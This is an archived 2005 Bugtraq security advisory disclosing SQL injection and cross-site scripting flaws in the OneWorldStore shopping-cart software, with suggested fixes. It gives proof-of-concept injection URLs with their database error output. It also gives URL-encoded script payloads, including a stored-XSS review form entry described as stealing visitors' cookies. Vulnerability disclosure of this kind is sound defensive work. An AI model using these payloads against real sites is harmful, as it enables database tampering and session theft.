[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple multiple sql injection/errors and xss vulnerabilities in
From: dcrab <dcrab () hackerscenter ! com>
Date: 2005-04-14 18:31:17
Message-ID: 20050414183117.2562.qmail () www ! securityfocus ! com
[Download RAW message or body]
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple multiple sql injection/errors and xss vulnerabilities in \
OneWorldStore
Date: 14/04/2005
Vendor: OneWorldStore
Vendor Website: http://www.oneworldstore.com
Summary: There are, multiple sql injection/errors and xss vulnerabilities in \
oneworldstore.
Proof of Concept Exploits:
http://example.com/owBasket/owAddItem.asp?idProduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT stock FROM Products WHERE idProduct = 'SQL_INJECTION
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owBasket/owAddItem.asp, line 48
http://example.com/owListProduct.asp?bSpecials='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owListProduct.asp?idCategory='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM Categories WHERE idCategory = ''SQL AND Active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owListProduct.asp, line 50
http://example.com/owProductDetail.asp?idproduct='SQL_INJECTION
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owProductDetail.asp?sAction=ProductReview&idProduct='SQL_INJECTION&idCategory=40&sUserName=&sUserEmail=&sRating=1&sBody=dcrab
SQL INJECTION
ODBC driver does not support the requested properties.
SELECT * FROM products WHERE idProduct = ''SQL_INJEC AND active = -1
ADODB.Recordset error '800a0e78'
Operation is not allowed when the object is closed.
/owProductDetail.asp, line 647
http://example.com/owContactUs.asp?sAction=Contact&sName=&sEmail='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&sType=None+Specified&sDescription=dcrab
Pops Cookie
http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C \
/script%3E&idCategory=64http://example.com/owListProduct.asp?bSub='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&idCategory=64
Pops Cookie
http://example.com/owProductDetail.asp
Submitting the review form, with someething like
Name:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Email:'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E@'%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.com
Rating:5
Comment: '%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Would cause long lasting permanent XSS and steal the cookies of anyone who visited \
the webpage.
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding \
with php.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic